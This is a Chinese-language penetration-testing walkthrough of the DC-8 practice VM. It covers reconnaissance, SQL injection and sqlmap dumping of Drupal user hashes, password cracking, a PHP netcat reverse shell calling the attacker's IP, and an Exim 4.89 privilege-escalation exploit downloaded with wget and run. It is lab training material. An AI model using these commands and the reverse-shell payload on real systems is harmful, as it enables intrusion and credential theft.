Neos的渗透测试靶机练习——DC-8

---

一、实验环境

虚拟机软件：VirtualBox
攻击机：kali linux（网卡初始为仅主机模式，要有安全意识）
靶机：DC-8（网卡初始为仅主机模式，要有安全意识）

---

二、开始渗透

1. 搜集信息

输入sudo su，将kali切换到root权限；

输入ifconfig查询自身ip，即攻击机ip；

可以看到自身ip为192.168.56.101。
输入arp-scan -l扫描本网段存活主机，即靶机ip地址。

可以看到靶机ip为192.168.56.115，。
输入nmap -sV -p- 192.168.56.115扫描靶机所有端口开放情况。

可以看到端口22、80是开放的。
浏览器输入192.168.56.115:80，发现是之前渗透遇到过的Drupal。

命令行输入whatweb -v 192.168.56.114查询网站指纹信息。

可以看到一些关键信息，其中Drupal是一个内容管理系统（CMS），版本为7。
输入dirsearch -u http://192.168.56.115:80，扫描网站目录。
发现有一大串，我们增加-i 200，只显示状态码为200的结果。
输入dirsearch -u http://192.168.56.115:80 -i 200，扫描结束，我们注意到扫描出来了登陆界面http://192.168.56.115/user/login/.

打开登陆界面，随便输入提交没有什么特别的回显，看来需要我们通过一些方式获得用户名密码然后登陆了。

2. sql注入

（1）测试注入点

点击页面左边Details板块中的三个页面，发现url中有参数nid可以尝试能不能注入。

将3改为单引号‘，发现回显错误信息，其中居然有sql语句。

这已经算是敏感信息泄露了，我们继续尝试参数修改为1 and 1=1#和1 and 1=2#


发现此处确实有sql注入漏洞。

（4）sqlmap

我们使用针对sql注入的自动化工具sqlmap，输入sqlmap -u "http://192.168.56.115/?nid=1" --dbs --batch，其中--dbs指爆破数据库，--batch默认不需要确定。

等待一会儿，发现成功爆破出数据库d7db和informaiotn_schema，其中d7db是用户自己创建的数据库，而information_schema是mysql版本5.0以下自带的数据库，保存用户信息。
我们继续输入sqlmap -u "http://192.168.56.115/?nid=1" -D d7db --tables --batch爆破d7db数据库的表名。

发现出来一长串，其中有users表。我们针对users表继续爆破属性名。
输入sqlmap -u "http://192.168.56.115/?nid=1" -D d7db -T users --columns，出来了结果。

其中name、pass应该是用户名密码，我们继续输入sqlmap -u "http://192.168.56.115/?nid=1" -D d7db -T users -C name,pass --dump
针对name、pass进行爆破。

爆破成功，有两个账户，admin和john，密码是加密字符串。将这两个加密字符串写入一个文件passwd.txt，使用john工具进行爆破。


爆破出来了个turtle，经过尝试，是john的密码，admin的密码没有爆破出来，使用该用户名密码登陆网站成功。

3. PHP上传，反弹shell

经过浏览，发现可以上传PHP code。

我们这里先命令行输入nc -lvvvp 4444监听本地4444端口，然后通过写一句话PHP代码：

<?php
@exec("nc -e /bin/bash 192.168.56.101 4444");
?> 

点击下方的save configuration保存，

最后重新提交Contact Us中的内容，反弹成功。

4. 提权

最后阶段了，往往都是要提权，经典操作，我们先输入python -c 'import pty;pty.spawn("/bin/bash")'，切换成交互式shell。

然后输入find / -perm -u=s -type f 2>/dev/null查询可以以root权限执行的指令，这一步也是经典操作。

发现其中的exim4是一个有版本漏洞的工具，可以提权。我们先看看它的版本，输入/usr/sbin/exim4 --version查看版本。

好的看到版本号是4.89，我们搜索一下它的版本漏洞，输入searchsploit exim。

发现有针对4.89版本的本地提权漏洞，那基本操作就是将46996.sh文件在靶机上运行即可。
我们先输入searchsploit -p /linux/local/46996.sh查找它的路径是什么。

然后根据其路径复制在当前目录上，输入cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh，然后打开一个http服务，输入python -m http.server 8800，8800为端口号。

然后靶机进入/tmp目录，输入wget http://192.168.56.101:8800/46996.sh ，将46996.sh传到靶机上。

上传成功，我们给46996.sh文件赋予权限777，使其得以执行。

经查看46996.sh文件内容，了解到其用法。

输入./46996.sh -m netcat，提权成功。

在/root目录下找到flag找到最终flag。

至此，渗透结束。

---

三、总结

本次渗透测试总体来讲感觉比较简单，基本都是我们之前用过的技巧，思路也基本相同，因为我们已经渐入佳境，慢慢的将一些操作变为本能，到哪一步干什么事，都变得愈发熟练起来，这正是我们逐渐变强的标志。

---